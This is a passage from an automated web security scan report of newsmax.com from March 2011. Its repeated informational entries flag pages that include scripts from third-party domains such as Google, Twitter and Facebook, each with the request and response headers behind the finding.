Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 53218
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 13:59:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Diplo
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.42. http://www.newsmax.com/Newsfront/UN-Japan-Earthquake/2011/03/19/id/390005  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /Newsfront/UN-Japan-Earthquake/2011/03/19/id/390005

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Newsfront/UN-Japan-Earthquake/2011/03/19/id/390005 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 56616
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:00:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Testi
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.43. http://www.newsmax.com/Politics/BernieSanders-Obama-challenger-liberal/2011/03/18/id/389989  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /Politics/BernieSanders-Obama-challenger-liberal/2011/03/18/id/389989

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Politics/BernieSanders-Obama-challenger-liberal/2011/03/18/id/389989 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 54913
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:10:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Indep
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.44. http://www.newsmax.com/Politics/Democrats-Budget-Issues/2011/03/18/id/389934  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /Politics/Democrats-Budget-Issues/2011/03/18/id/389934

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Politics/Democrats-Budget-Issues/2011/03/18/id/389934 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 54060
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:10:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Dems:
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.45. http://www.newsmax.com/Politics/HouseMembersMoveAgainstChildPorn/2011/03/18/id/389932  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /Politics/HouseMembersMoveAgainstChildPorn/2011/03/18/id/389932

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Politics/HouseMembersMoveAgainstChildPorn/2011/03/18/id/389932 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 53536
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:10:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   House
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.46. http://www.newsmax.com/Politics/Huckabee-Nelson-Florida-Senate/2011/03/18/id/389971  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /Politics/Huckabee-Nelson-Florida-Senate/2011/03/18/id/389971

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Politics/Huckabee-Nelson-Florida-Senate/2011/03/18/id/389971 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 53998
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:10:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Hucka
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.47. http://www.newsmax.com/Politics/RepublicanstoFocusonBudgetCuts-JobsLink/2011/03/18/id/389946  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /Politics/RepublicanstoFocusonBudgetCuts-JobsLink/2011/03/18/id/389946

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Politics/RepublicanstoFocusonBudgetCuts-JobsLink/2011/03/18/id/389946 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 53776
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:10:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Repub
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.48. http://www.newsmax.com/Politics/TwoPartiesinMajorShowdownonBudget/2011/03/18/id/389923  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /Politics/TwoPartiesinMajorShowdownonBudget/2011/03/18/id/389923

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Politics/TwoPartiesinMajorShowdownonBudget/2011/03/18/id/389923 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 53615
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:11:09 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Two P
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.49. http://www.newsmax.com/Politics/nancypelosi-capitolhill-democrats-obama/2011/03/17/id/389836  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /Politics/nancypelosi-capitolhill-democrats-obama/2011/03/17/id/389836

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Politics/nancypelosi-capitolhill-democrats-obama/2011/03/17/id/389836 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 54807
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:10:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Capit
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.50. http://www.newsmax.com/Politics/pelosi-democrats-obamacare/2011/03/18/id/389963  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /Politics/pelosi-democrats-obamacare/2011/03/18/id/389963

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Politics/pelosi-democrats-obamacare/2011/03/18/id/389963 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 54475
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:10:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Democ
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.51. http://www.newsmax.com/PrivacyStatement  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /PrivacyStatement

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /PrivacyStatement HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,no-cache, must-revalidate
Pragma: no-cache
Content-Length: 37109
Content-Type: text/html
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.52. http://www.newsmax.com/SciTech/ML-Iran-Space/2011/03/17/id/389737  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /SciTech/ML-Iran-Space/2011/03/17/id/389737

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /SciTech/ML-Iran-Space/2011/03/17/id/389737 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 53615
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:11:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Repor
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.53. http://www.newsmax.com/SciTech/US-Books-E-Sales/2011/03/18/id/389868  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /SciTech/US-Books-E-Sales/2011/03/18/id/389868

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /SciTech/US-Books-E-Sales/2011/03/18/id/389868 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 55061
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:11:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Sales
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.54. http://www.newsmax.com/SciTech/USDronetoInspectJapansQuake-CrippledNuclearPlant/2011/03/17/id/389742  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /SciTech/USDronetoInspectJapansQuake-CrippledNuclearPlant/2011/03/17/id/389742

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /SciTech/USDronetoInspectJapansQuake-CrippledNuclearPlant/2011/03/17/id/389742 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 53024
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:11:44 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   US Dr
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<!-- Acudeo companion banner loader script -->
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script><script type="text/javascript" src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"></script>
...[SNIP]...

2.55. http://www.newsmax.com/ScienceTechnology  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /ScienceTechnology

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ScienceTechnology HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 44524
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 13:59:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Newsm
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
<script language="JavaScript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

2.56. http://www.newsmax.com/Slideshows  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsmax.com
Path:   /Slideshows

Issue detail

